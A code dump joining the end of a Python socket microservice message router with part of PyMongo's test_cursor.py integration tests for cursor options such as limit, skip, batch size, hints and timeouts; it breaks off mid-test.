Microservice.get_microservice(msg_splitted[0][1:]) verification_code = None if dest is None: verification_code = "*BAD_DEST_NAME".encode(FORMAT) logger.error(f"Bad destination name : {msg_splitted[0][1:]} from {name}") elif dest.alive is False: verification_code = "*DIED_DEST".encode(FORMAT) logger.warning(f"Died dest : {msg_splitted[0][1:]} asked from {name}") elif dest.send_socket is None: verification_code = "*NO_SOCKET_DEST".encode(FORMAT) logger.warning(f"No socket dest : {msg_splitted[0][1:]} asked from {name}") else: data = msg[0] + msg_splitted[1] + " " + name + " " + msg[len(msg_splitted[0]) + len(msg_splitted[1]) + 2:] #cur_request = Request(microservice_obj, dest, data) #send the request try: dest.send(data) except: verification_code = "*DEST_SOCKET_WORKING_ERR".encode(FORMAT) logger.warning(f"Error when sending data (socket closed ?) to : {msg_splitted[0][1:]} asked from {name}\n{data}") if verification_code is None: #no above error verification_code = f"V{msg_length}".encode(FORMAT) verification_lenght = str(len(verification_code)).encode(FORMAT) conn.send(verification_lenght) conn.recv(HEADER) #to prevent sending verif lenght and code in same time conn.send(verification_code) else: conn.send("*BAD_PREFIX".encode(FORMAT)) logger.warn(f"no correct prefix specified : {msg} from {name}") else: logger.info("None received, closing servermode loop") break logger.info(f"microservice {name}'s request port (our SERVERmode) disconnected") if microservice_obj.last_listening_connexion_etablished == etablished_time: logger.warning(f"We've set the microservice {name} to died") microservice_obj.alive = False #if there is no other new handle_client connexion def start_servermode(): server.listen() logger.info("server is listening...") while True: conn, addr = server.accept() thread = threading.Thread(target=handle_client, args=(conn, addr)) thread.start() logger.debug(f"new servermode connexion started") def start_clientmode(): client.listen() logger.info("client is listening...") while True: conn, addr = client.accept() thread = threading.Thread(target=handle_server, args=(conn, addr)) thread.start() logger.debug("new clientmode connexion started") logger.warning("Started main microservice server") thread_servermode = threading.Thread(target=start_servermode) thread_servermode.start() start_clientmode()
test_cursor.py
# Copyright 2009-present MongoDB, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test the cursor module.""" import copy import gc import itertools import random import re import sys import time import threading import warnings sys.path[0:0] = [""] from bson import decode_all from bson.code import Code from bson.son import SON from pymongo import (ASCENDING, DESCENDING, ALL, OFF) from pymongo.collation import Collation from pymongo.cursor import Cursor, CursorType from pymongo.errors import (ConfigurationError, ExecutionTimeout, InvalidOperation, OperationFailure) from pymongo.read_concern import ReadConcern from test import (client_context, unittest, IntegrationTest) from test.utils import (EventListener, ignore_deprecations, rs_or_single_client, WhiteListEventListener) class TestCursor(IntegrationTest): def test_deepcopy_cursor_littered_with_regexes(self): cursor = self.db.test.find({ "x": re.compile("^hmmm.*"), "y": [re.compile("^hmm.*")], "z": {"a": [re.compile("^hm.*")]}, re.compile("^key.*"): {"a": [re.compile("^hm.*")]}}) cursor2 = copy.deepcopy(cursor) self.assertEqual(cursor._Cursor__spec, cursor2._Cursor__spec) def test_add_remove_option(self): cursor = self.db.test.find() self.assertEqual(0, cursor._Cursor__query_flags) cursor.add_option(2) cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE) self.assertEqual(2, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.add_option(32) cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT) self.assertEqual(34, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.add_option(128) cursor2 = self.db.test.find( cursor_type=CursorType.TAILABLE_AWAIT).add_option(128) self.assertEqual(162, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) self.assertEqual(162, cursor._Cursor__query_flags) cursor.add_option(128) self.assertEqual(162, cursor._Cursor__query_flags) cursor.remove_option(128) cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT) self.assertEqual(34, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.remove_option(32) cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE) self.assertEqual(2, cursor2._Cursor__query_flags) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) self.assertEqual(2, cursor._Cursor__query_flags) cursor.remove_option(32) self.assertEqual(2, cursor._Cursor__query_flags) # Timeout cursor = self.db.test.find(no_cursor_timeout=True) self.assertEqual(16, cursor._Cursor__query_flags) cursor2 = self.db.test.find().add_option(16) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.remove_option(16) self.assertEqual(0, cursor._Cursor__query_flags) # Tailable / Await data cursor = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT) self.assertEqual(34, cursor._Cursor__query_flags) cursor2 = self.db.test.find().add_option(34) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.remove_option(32) self.assertEqual(2, cursor._Cursor__query_flags) # Partial cursor = self.db.test.find(allow_partial_results=True) self.assertEqual(128, cursor._Cursor__query_flags) cursor2 = self.db.test.find().add_option(128) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) cursor.remove_option(128) self.assertEqual(0, cursor._Cursor__query_flags) def test_add_remove_option_exhaust(self): # Exhaust - which mongos doesn't support if client_context.is_mongos: with self.assertRaises(InvalidOperation): self.db.test.find(cursor_type=CursorType.EXHAUST) else: cursor = self.db.test.find(cursor_type=CursorType.EXHAUST) self.assertEqual(64, cursor._Cursor__query_flags) cursor2 = self.db.test.find().add_option(64) self.assertEqual(cursor._Cursor__query_flags, cursor2._Cursor__query_flags) self.assertTrue(cursor._Cursor__exhaust) cursor.remove_option(64) self.assertEqual(0, cursor._Cursor__query_flags) self.assertFalse(cursor._Cursor__exhaust) def test_allow_disk_use(self): db = self.db db.pymongo_test.drop() coll = db.pymongo_test self.assertRaises(TypeError, coll.find().allow_disk_use, 'baz') cursor = coll.find().allow_disk_use(True) self.assertEqual(True, cursor._Cursor__allow_disk_use) cursor = coll.find().allow_disk_use(False) self.assertEqual(False, cursor._Cursor__allow_disk_use) def test_max_time_ms(self): db = self.db db.pymongo_test.drop() coll = db.pymongo_test self.assertRaises(TypeError, coll.find().max_time_ms, 'foo') coll.insert_one({"amalia": 1}) coll.insert_one({"amalia": 2}) coll.find().max_time_ms(None) coll.find().max_time_ms(1) cursor = coll.find().max_time_ms(999) self.assertEqual(999, cursor._Cursor__max_time_ms) cursor = coll.find().max_time_ms(10).max_time_ms(1000) self.assertEqual(1000, cursor._Cursor__max_time_ms) cursor = coll.find().max_time_ms(999) c2 = cursor.clone() self.assertEqual(999, c2._Cursor__max_time_ms) self.assertTrue("$maxTimeMS" in cursor._Cursor__query_spec()) self.assertTrue("$maxTimeMS" in c2._Cursor__query_spec()) self.assertTrue(coll.find_one(max_time_ms=1000)) client = self.client if (not client_context.is_mongos and client_context.test_commands_enabled): # Cursor parses server timeout error in response to initial query. client.admin.command("configureFailPoint", "maxTimeAlwaysTimeOut", mode="alwaysOn") try: cursor = coll.find().max_time_ms(1) try: next(cursor) except ExecutionTimeout: pass else: self.fail("ExecutionTimeout not raised") self.assertRaises(ExecutionTimeout, coll.find_one, max_time_ms=1) finally: client.admin.command("configureFailPoint", "maxTimeAlwaysTimeOut", mode="off") @client_context.require_version_min(3, 1, 9, -1) def test_max_await_time_ms(self): db = self.db db.pymongo_test.drop() coll = db.create_collection("pymongo_test", capped=True, size=4096) self.assertRaises(TypeError, coll.find().max_await_time_ms, 'foo') coll.insert_one({"amalia": 1}) coll.insert_one({"amalia": 2}) coll.find().max_await_time_ms(None) coll.find().max_await_time_ms(1) # When cursor is not tailable_await cursor = coll.find() self.assertEqual(None, cursor._Cursor__max_await_time_ms) cursor = coll.find().max_await_time_ms(99) self.assertEqual(None, cursor._Cursor__max_await_time_ms) # If cursor is tailable_await and timeout is unset cursor = coll.find(cursor_type=CursorType.TAILABLE_AWAIT) self.assertEqual(None, cursor._Cursor__max_await_time_ms) # If cursor is tailable_await and timeout is set cursor = coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(99) self.assertEqual(99, cursor._Cursor__max_await_time_ms) cursor = coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms( 10).max_await_time_ms(90) self.assertEqual(90, cursor._Cursor__max_await_time_ms) listener = WhiteListEventListener('find', 'getMore') coll = rs_or_single_client( event_listeners=[listener])[self.db.name].pymongo_test results = listener.results # Tailable_await defaults. list(coll.find(cursor_type=CursorType.TAILABLE_AWAIT)) # find self.assertFalse('maxTimeMS' in results['started'][0].command) # getMore self.assertFalse('maxTimeMS' in results['started'][1].command) results.clear() # Tailable_await with max_await_time_ms set. list(coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertFalse('maxTimeMS' in results['started'][0].command) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertTrue('maxTimeMS' in results['started'][1].command) self.assertEqual(99, results['started'][1].command['maxTimeMS']) results.clear() # Tailable_await with max_time_ms list(coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertTrue('maxTimeMS' in results['started'][0].command) self.assertEqual(99, results['started'][0].command['maxTimeMS']) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertFalse('maxTimeMS' in results['started'][1].command) results.clear() # Tailable_await with both max_time_ms and max_await_time_ms list(coll.find( cursor_type=CursorType.TAILABLE_AWAIT).max_time_ms( 99).max_await_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertTrue('maxTimeMS' in results['started'][0].command) self.assertEqual(99, results['started'][0].command['maxTimeMS']) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertTrue('maxTimeMS' in results['started'][1].command) self.assertEqual(99, results['started'][1].command['maxTimeMS']) results.clear() # Non tailable_await with max_await_time_ms list(coll.find(batch_size=1).max_await_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertFalse('maxTimeMS' in results['started'][0].command) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertFalse('maxTimeMS' in results['started'][1].command) results.clear() # Non tailable_await with max_time_ms list(coll.find(batch_size=1).max_time_ms(99)) # find self.assertEqual('find', results['started'][0].command_name) self.assertTrue('maxTimeMS' in results['started'][0].command) self.assertEqual(99, results['started'][0].command['maxTimeMS']) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertFalse('maxTimeMS' in results['started'][1].command) # Non tailable_await with both max_time_ms and max_await_time_ms list(coll.find(batch_size=1).max_time_ms(99).max_await_time_ms(88)) # find self.assertEqual('find', results['started'][0].command_name) self.assertTrue('maxTimeMS' in results['started'][0].command) self.assertEqual(99, results['started'][0].command['maxTimeMS']) # getMore self.assertEqual('getMore', results['started'][1].command_name) self.assertFalse('maxTimeMS' in results['started'][1].command) @client_context.require_test_commands @client_context.require_no_mongos def test_max_time_ms_getmore(self): # Test that Cursor handles server timeout error in response to getmore. coll = self.db.pymongo_test coll.insert_many([{} for _ in range(200)]) cursor = coll.find().max_time_ms(100) # Send initial query before turning on failpoint. next(cursor) self.client.admin.command("configureFailPoint", "maxTimeAlwaysTimeOut", mode="alwaysOn") try: try: # Iterate up to first getmore. list(cursor) except ExecutionTimeout: pass else: self.fail("ExecutionTimeout not raised") finally: self.client.admin.command("configureFailPoint", "maxTimeAlwaysTimeOut", mode="off") def test_explain(self): a = self.db.test.find() a.explain() for _ in a: break b = a.explain() # "cursor" pre MongoDB 2.7.6, "executionStats" post self.assertTrue("cursor" in b or "executionStats" in b) def test_explain_with_read_concern(self): # Do not add readConcern level to explain. listener = WhiteListEventListener("explain") client = rs_or_single_client(event_listeners=[listener]) self.addCleanup(client.close) coll = client.pymongo_test.test.with_options( read_concern=ReadConcern(level="local")) self.assertTrue(coll.find().explain()) started = listener.results['started'] self.assertEqual(len(started), 1) self.assertNotIn("readConcern", started[0].command) def test_hint(self): db = self.db self.assertRaises(TypeError, db.test.find().hint, 5.5) db.test.drop() db.test.insert_many([{"num": i, "foo": i} for i in range(100)]) self.assertRaises(OperationFailure, db.test.find({"num": 17, "foo": 17}) .hint([("num", ASCENDING)]).explain) self.assertRaises(OperationFailure, db.test.find({"num": 17, "foo": 17}) .hint([("foo", ASCENDING)]).explain) spec = [("num", DESCENDING)] index = db.test.create_index(spec) first = next(db.test.find()) self.assertEqual(0, first.get('num')) first = next(db.test.find().hint(spec)) self.assertEqual(99, first.get('num')) self.assertRaises(OperationFailure, db.test.find({"num": 17, "foo": 17}) .hint([("foo", ASCENDING)]).explain) a = db.test.find({"num": 17}) a.hint(spec) for _ in a: break self.assertRaises(InvalidOperation, a.hint, spec) def test_hint_by_name(self): db = self.db db.test.drop() db.test.insert_many([{"i": i} for i in range(100)]) db.test.create_index([('i', DESCENDING)], name='fooindex') first = next(db.test.find()) self.assertEqual(0, first.get('i')) first = next(db.test.find().hint('fooindex')) self.assertEqual(99, first.get('i')) def test_limit(self): db = self.db self.assertRaises(TypeError, db.test.find().limit, None) self.assertRaises(TypeError, db.test.find().limit, "hello") self.assertRaises(TypeError, db.test.find().limit, 5.5) self.assertTrue(db.test.find().limit(5)) db.test.drop() db.test.insert_many([{"x": i} for i in range(100)]) count = 0 for _ in db.test.find(): count += 1 self.assertEqual(count, 100) count = 0 for _ in db.test.find().limit(20): count += 1 self.assertEqual(count, 20) count = 0 for _ in db.test.find().limit(99): count += 1 self.assertEqual(count, 99) count = 0 for _ in db.test.find().limit(1): count += 1 self.assertEqual(count, 1) count = 0 for _ in db.test.find().limit(0): count += 1 self.assertEqual(count, 100) count = 0 for _ in db.test.find().limit(0).limit(50).limit(10): count += 1 self.assertEqual(count, 10) a = db.test.find() a.limit(10) for _ in a: break self.assertRaises(InvalidOperation, a.limit, 5) @ignore_deprecations # Ignore max without hint. def test_max(self): db = self.db db.test.drop() j_index = [("j", ASCENDING)] db.test.create_index(j_index) db.test.insert_many([{"j": j, "k": j} for j in range(10)]) def find(max_spec, expected_index): cursor = db.test.find().max(max_spec) if client_context.requires_hint_with_min_max_queries: cursor = cursor.hint(expected_index) return cursor cursor = find([("j", 3)], j_index) self.assertEqual(len(list(cursor)), 3) # Tuple. cursor = find((("j", 3),), j_index) self.assertEqual(len(list(cursor)), 3) # Compound index. index_keys = [("j", ASCENDING), ("k", ASCENDING)] db.test.create_index(index_keys) cursor = find([("j", 3), ("k", 3)], index_keys) self.assertEqual(len(list(cursor)), 3) # Wrong order. cursor = find([("k", 3), ("j", 3)], index_keys) self.assertRaises(OperationFailure, list, cursor) # No such index. cursor = find([("k", 3)], "k") self.assertRaises(OperationFailure, list, cursor) self.assertRaises(TypeError, db.test.find().max, 10) self.assertRaises(TypeError, db.test.find().max, {"j": 10}) @ignore_deprecations # Ignore min without hint. def test_min(self): db = self.db db.test.drop() j_index = [("j", ASCENDING)] db.test.create_index(j_index) db.test.insert_many([{"j": j, "k": j} for j in range(10)]) def find(min_spec, expected_index): cursor = db.test.find().min(min_spec) if client_context.requires_hint_with_min_max_queries: cursor = cursor.hint(expected_index) return cursor cursor = find([("j", 3)], j_index) self.assertEqual(len(list(cursor)), 7) # Tuple. cursor = find((("j", 3),), j_index) self.assertEqual(len(list(cursor)), 7) # Compound index. index_keys = [("j", ASCENDING), ("k", ASCENDING)] db.test.create_index(index_keys) cursor = find([("j", 3), ("k", 3)], index_keys) self.assertEqual(len(list(cursor)), 7) # Wrong order. cursor = find([("k", 3), ("j", 3)], index_keys) self.assertRaises(OperationFailure, list, cursor) # No such index. cursor = find([("k", 3)], "k") self.assertRaises(OperationFailure, list, cursor) self.assertRaises(TypeError, db.test.find().min, 10) self.assertRaises(TypeError, db.test.find().min, {"j": 10}) @client_context.require_version_max(4, 1, -1) def test_min_max_without_hint(self): coll = self.db.test j_index = [("j", ASCENDING)] coll.create_index(j_index) with warnings.catch_warnings(record=True) as warns: warnings.simplefilter("default", DeprecationWarning) list(coll.find().min([("j", 3)])) self.assertIn('using a min/max query operator', str(warns[0])) # Ensure the warning is raised with the proper stack level. del warns[:] list(coll.find().min([("j", 3)])) self.assertIn('using a min/max query operator', str(warns[0])) del warns[:] list(coll.find().max([("j", 3)])) self.assertIn('using a min/max query operator', str(warns[0])) def test_batch_size(self): db = self.db db.test.drop() db.test.insert_many([{"x": x} for x in range(200)]) self.assertRaises(TypeError, db.test.find().batch_size, None) self.assertRaises(TypeError, db.test.find().batch_size, "hello") self.assertRaises(TypeError, db.test.find().batch_size, 5.5) self.assertRaises(ValueError, db.test.find().batch_size, -1) self.assertTrue(db.test.find().batch_size(5)) a = db.test.find() for _ in a: break self.assertRaises(InvalidOperation, a.batch_size, 5) def cursor_count(cursor, expected_count): count = 0 for _ in cursor: count += 1 self.assertEqual(expected_count, count) cursor_count(db.test.find().batch_size(0), 200) cursor_count(db.test.find().batch_size(1), 200) cursor_count(db.test.find().batch_size(2), 200) cursor_count(db.test.find().batch_size(5), 200) cursor_count(db.test.find().batch_size(100), 200) cursor_count(db.test.find().batch_size(500), 200) cursor_count(db.test.find().batch_size(0).limit(1), 1) cursor_count(db.test.find().batch_size(1).limit(1), 1) cursor_count(db.test.find().batch_size(2).limit(1), 1) cursor_count(db.test.find().batch_size(5).limit(1), 1) cursor_count(db.test.find().batch_size(100).limit(1), 1) cursor_count(db.test.find().batch_size(500).limit(1), 1) cursor_count(db.test.find().batch_size(0).limit(10), 10) cursor_count(db.test.find().batch_size(1).limit(10), 10) cursor_count(db.test.find().batch_size(2).limit(10), 10) cursor_count(db.test.find().batch_size(5).limit(10), 10) cursor_count(db.test.find().batch_size(100).limit(10), 10) cursor_count(db.test.find().batch_size(500).limit(10), 10) cur = db.test.find().batch_size(1) next(cur) if client_context.version.at_least(3, 1, 9): # find command batchSize should be 1 self.assertEqual(0, len(cur._Cursor__data)) else: # OP_QUERY ntoreturn should be 2 self.assertEqual(1, len(cur._Cursor__data)) next(cur) self.assertEqual(0, len(cur._Cursor__data)) next(cur) self.assertEqual(0, len(cur._Cursor__data)) next(cur) self.assertEqual(0, len(cur._Cursor__data)) def test_limit_and_batch_size(self): db = self.db db.test.drop() db.test.insert_many([{"x": x} for x in range(500)]) curs = db.test.find().limit(0).batch_size(10) next(curs) self.assertEqual(10, curs._Cursor__retrieved) curs = db.test.find(limit=0, batch_size=10) next(curs) self.assertEqual(10, curs._Cursor__retrieved) curs = db.test.find().limit(-2).batch_size(0) next(curs) self.assertEqual(2, curs._Cursor__retrieved) curs = db.test.find(limit=-2, batch_size=0) next(curs) self.assertEqual(2, curs._Cursor__retrieved) curs = db.test.find().limit(-4).batch_size(5) next(curs) self.assertEqual(4, curs._Cursor__retrieved) curs = db.test.find(limit=-4, batch_size=5) next(curs) self.assertEqual(4, curs._Cursor__retrieved) curs = db.test.find().limit(50).batch_size(500) next(curs) self.assertEqual(50, curs._Cursor__retrieved) curs = db.test.find(limit=50, batch_size=500) next(curs) self.assertEqual(50, curs._Cursor__retrieved) curs = db.test.find().batch_size(500) next(curs) self.assertEqual(500, curs._Cursor__retrieved) curs = db.test.find(batch_size=500) next(curs) self.assertEqual(500, curs._Cursor__retrieved) curs = db.test.find().limit(50) next(curs) self.assertEqual(50, curs._Cursor__retrieved) curs = db.test.find(limit=50) next(curs) self.assertEqual(50, curs._Cursor__retrieved) # these two might be shaky, as the default # is set by the server. as of 2.0.0-rc0, 101 # or 1MB (whichever is smaller) is default # for queries without ntoreturn curs = db.test.find() next(curs) self.assertEqual(101, curs._Cursor__retrieved) curs = db.test.find().limit(0).batch_size(0) next(curs) self.assertEqual(101, curs._Cursor__retrieved) curs = db.test.find(limit=0, batch_size=0) next(curs) self.assertEqual(101, curs._Cursor__retrieved) def test_skip(self): db = self.db self.assertRaises(TypeError, db.test.find().skip, None) self.assertRaises(TypeError, db.test.find().skip, "hello") self.assertRaises(TypeError, db.test.find().skip, 5.5) self.assertRaises(ValueError, db.test.find().skip, -5) self.assertTrue(db.test.find().skip(5)) db.drop_collection("test") db.test.insert_many([{"x": i} for i in range(100)]) for i in db.test.find(): self.assertEqual(i["x"], 0) break for i in db.test.find().skip(20): self.assertEqual(i["x"], 20) break for i in db.test.find().skip(99): self.assertEqual(i["x"], 99) break for i in db.test.find().skip(1): self.assertEqual(i["x"], 1) break for i in db.test.find().skip(0): self.assertEqual(i["x"], 0) break for i in db.test.find().skip(0).skip(50).skip(10): self.assertEqual(i["x"], 10) break for i in db.test.find().skip(1000): self.fail() a = db.test.find() a.skip(10) for _ in a: break self.assertRaises(InvalidOperation, a.skip, 5) def test_sort(self): db = self.db self.assertRaises(TypeError, db.test.find().sort, 5) self.assertRaises(ValueError, db.test.find().sort, []) self.assertRaises(TypeError, db.test.find().sort, [], ASCENDING) self.assertRaises(TypeError, db.test.find().sort, [("hello", DESCENDING)], DESCENDING) db.test.drop() unsort = list(range(10)) random.shuffle(unsort) db.test.insert_many([{"x": i} for i in unsort]) asc = [i["x"] for i in db.test.find().sort("x", ASCENDING)] self.assertEqual(asc, list(range(10))) asc = [i["x"] for i in db.test.find().sort("x")] self.assertEqual(asc, list(range(10))) asc = [i["x"] for i in db.test.find().sort([("x", ASCENDING)])] self.assertEqual(asc, list(range(10))) expect = list(reversed(range(10))) desc = [i["x"] for i in db.test.find().sort("x", DESCENDING)] self.assertEqual(desc, expect) desc = [i["x"] for i in db.test.find().sort([("x", DESCENDING)])] self.assertEqual(desc, expect) desc = [i["x"] for i in db.test.find().sort("x", ASCENDING).sort("x", DESCENDING)] self.assertEqual(desc, expect) expected = [(1, 5), (2, 5), (0, 3), (7, 3), (9, 2), (2, 1), (3, 1)] shuffled = list(expected) random.shuffle(shuffled) db.test.drop() for (a, b) in shuffled: db.test.insert_one({"a": a, "b": b}) result = [(i["a"], i["b"]) for i in db.test.find().sort([("b", DESCENDING), ("a", ASCENDING)])] self.assertEqual(result, expected) a = db.test.find() a.sort("x", ASCENDING) for _ in a: break self.assertRaises(InvalidOperation, a.sort, "x", ASCENDING) @ignore_deprecations def test_count(self): db = self.db db.test.drop() self.assertEqual(0, db.test.find().count()) db.test.insert_many([{"x": i} for i in range(10)]) self.assertEqual(10, db.test.find().count()) self.assertTrue(isinstance(db.test.find().count(), int)) self.assertEqual(10, db.test.find().limit(5).count()) self.assertEqual(10, db.test.find().skip(5).count()) self.assertEqual(1, db.test.find({"x": 1}).count()) self.assertEqual(5, db.test.find({"x": {"$lt": 5}}).count()) a = db.test.find() b = a.count() for _ in a: break self.assertEqual(b, a.count()) self.assertEqual(0, db.test.acollectionthatdoesntexist.find().count()) @ignore_deprecations def test_count_with_hint(self): collection = self.db.test collection.drop() collection.insert_many([{'i': 1}, {'i': 2}]) self.assertEqual(2, collection.find().count()) collection.create_index([('i', 1)]) self.assertEqual(1, collection.find({'i': 1}).hint("_id_").count()) self.assertEqual(2, collection.find().hint("_id_").count()) self.assertRaises(OperationFailure, collection.find({'i': 1}).hint("BAD HINT").count) # Create a sparse index which should have no entries. collection.create_index([('x', 1)], sparse=True) self.assertEqual(0, collection.find({'i': 1}).hint("x_1").count()) self.assertEqual( 0, collection.find({'i': 1}).hint([("x", 1)]).count()) if client_context.version.at_least(3, 3, 2): self.assertEqual(0, collection.find().hint("x_1").count()) self.assertEqual(0, collection.find().hint([("x", 1)]).count()) else: self.assertEqual(2, collection.find().hint("x_1").count()) self.assertEqual(2, collection.find().hint([("x", 1)]).count()) @ignore_deprecations def test_where(self): db = self.db db.test.drop() a = db.test.find() self.assertRaises(TypeError, a.where, 5) self.assertRaises(TypeError, a.where, None) self.assertRaises(TypeError, a.where, {}) db.test.insert_many([{"x": i} for i in range(10)]) self.assertEqual(3, len(list(db.test.find().where('this.x < 3')))) self.assertEqual(3, len(list(db.test.find().where(Code('this.x < 3'))))) code_with_scope = Code('this.x < i', {"i": 3}) if client_context.version.at_least(4, 3, 3): # MongoDB 4.4 removed support for Code with scope. with self.assertRaises(OperationFailure): list(db.test.find().where(code_with_scope)) code_with_empty_scope = Code('this.x < 3', {}) with self.assertRaises(OperationFailure): list(db.test.find().where(code_with_empty_scope)) else: self.assertEqual( 3, len(list(db.test.find().where(code_with_scope)))) self.assertEqual(10, len(list(db.test.find()))) self.assertEqual(3, db.test.find().where('this.x < 3').count()) self.assertEqual(10, db.test.find().count()) self.assertEqual([0, 1, 2], [a["x"] for a in db.test.find().where('this.x < 3')]) self.assertEqual([], [a["x"] for a in db.test.find({"x": 5}).where('this.x < 3')]) self.assertEqual([5], [a["x"] for a in db.test.find({"x": 5}).where('this.x > 3')]) cursor = db.test.find().where('this.x < 3').where('this.x > 7') self.assertEqual([8, 9], [a["x"] for a in cursor]) a = db.test.find() b = a.where('this.x > 3') for _ in a: break self.assertRaises(InvalidOperation, a.where, 'this.x < 3') def test_rewind(self): self.db.test.insert_many([{"x": i} for i in range(1, 4)]) cursor = self.db.test.find().limit(2) count = 0 for _ in cursor: count += 1 self.assertEqual(2, count) count = 0 for _ in cursor: count += 1 self.assertEqual(0, count) cursor.rewind() count = 0 for _ in cursor: count += 1 self.assertEqual(2, count) cursor.rewind() count = 0 for _ in cursor: break cursor.rewind() for _ in cursor: count += 1 self.assertEqual(2, count) self.assertEqual(cursor, cursor.rewind()) # oplog_reply, and snapshot are all deprecated. @ignore_deprecations def test_clone(self): self.db.test.insert_many([{"x": i} for i in range(1, 4)]) cursor = self.db.test.find().limit(2) count = 0 for _ in cursor: count += 1 self.assertEqual(2, count) count = 0 for _ in cursor: count += 1 self.assertEqual(0, count) cursor = cursor.clone() cursor2 = cursor.clone() count = 0 for _ in cursor: count += 1 self.assertEqual(2, count) for _ in cursor2: count += 1 self.assertEqual(4, count) cursor.rewind() count = 0 for _ in cursor: break cursor = cursor.clone() for _ in cursor: count += 1 self.assertEqual(2, count) self.assertNotEqual(cursor, cursor.clone()) # Just test attributes cursor = self.db.test.find({"x": re.compile("^hello.*")}, projection={'_id': False}, skip=1, no_cursor_timeout=True, cursor_type=CursorType.TAILABLE_AWAIT, sort=[("x", 1)], allow_partial_results=True, oplog_replay=True, batch_size=123, collation={'locale': 'en_US'}, hint=[("_id", 1)], max_scan=100, max_time_ms=1000, return_key=True, show_record_id=True, snapshot=True, allow_disk_use=True).limit(2) cursor.min([('a', 1)]).max([('b', 3)]) cursor.add_option(128) cursor.comment('hi!') # Every attribute should be the same. cursor2 = cursor.clone() self.assertEqual(cursor.__dict__, cursor2.__dict__) # Shallow copies can so can mutate cursor2 = copy.copy(cursor) cursor2._Cursor__projection['cursor2'] = False self.assertTrue('cursor2' in cursor._Cursor__projection) # Deepcopies and shouldn't mutate cursor3 = copy.deepcopy(cursor) cursor3._Cursor__projection['cursor3'] = False self.assertFalse('cursor3' in cursor._Cursor__projection) cursor4 = cursor.clone() cursor4._Cursor__projection['cursor4'] = False self.assertFalse('cursor4' in cursor._Cursor__projection) # Test memo when deepcopying queries query = {"hello": "world"} query["reflexive"] = query cursor = self.db.test.find(query) cursor2 = copy.deepcopy(cursor) self.assertNotEqual(id(cursor._Cursor__spec), id(cursor2._Cursor__spec)) self.assertEqual(id(cursor2._Cursor__spec['reflexive']), id(cursor2._Cursor__spec)) self.assertEqual(len(cursor2._Cursor__spec), 2) # Ensure hints are cloned as the correct type cursor = self.db.test.find().hint([('z', 1), ("a", 1)]) cursor2 = copy.deepcopy(cursor) self.assertTrue(isinstance(cursor2._Cursor__hint, SON)) self.assertEqual(cursor._Cursor__hint, cursor2._Cursor__hint) def test_clone_empty(self): self.db.test.delete_many({}) self.db.test.insert_many([{"x": i} for i in range(1, 4)]) cursor = self.db.test.find()[2:2] cursor2 = cursor.clone() self.assertRaises(StopIteration, cursor.next) self.assertRaises(StopIteration, cursor2.next) @ignore_deprecations def test_count_with_fields(self): self.db.test.drop() self.db.test.insert_one({"x": 1}) self.assertEqual(1, self.db.test.find({}, ["a"]).count()) def test_bad_getitem(self): self.assertRaises(TypeError, lambda x: self.db.test.find()[x], "hello") self.assertRaises(TypeError, lambda x: self.db.test.find()[x], 5.5) self.assertRaises(TypeError, lambda x: self.db.test.find()[x], None) def test_getitem_slice_index(self): self.db.drop_collection("test") self.db.test.insert_many([{"i": i} for i in range(100)]) count = itertools.count self.assertRaises(IndexError, lambda: self.db.test.find()[-1:]) self.assertRaises(IndexError, lambda: self.db.test.find()[1:2:2]) for a, b in zip(count(0), self.db.test.find()): self.assertEqual(a, b['i']) self.assertEqual(100, len(list(self.db.test.find()[0:]))) for a, b in zip(count(0), self.db.test.find()[0:]): self.assertEqual(a, b['i']) self.assertEqual(80, len(list(self.db.test.find()[20:]))) for a, b in zip(count(20), self.db.test.find()[20:]): self.assertEqual(a, b['i']) for a, b in zip(count(99), self.db.test.find()[99:]): self.assertEqual(a, b['i']) for i in self.db.test.find()[1000:]: self.fail() self.assertEqual(5, len(list(self.db.test.find()[20:25]))) self.assertEqual(5, len(list( self.db.test.find()[20:25]))) for a, b in zip(count(20), self.db.test.find()[20:25]): self.assertEqual(a, b['i']) self.assertEqual(80, len(list(self.db.test.find()[40:45][20:]))) for a, b in zip(count(20), self.db.test.find()[40:45][20:]): self.assertEqual(a, b['i']) self.assertEqual(80, len(list(self.db.test.find()[40:45].limit(0).skip(20)) ) ) for a, b in zip(count(20), self.db.test.find()[40:45].limit(0).skip(20)): self.assertEqual(a, b['i']) self.assertEqual(80, len(list(self.db.test.find().limit(10).skip(40)[20:])) ) for a, b in zip(count(20), 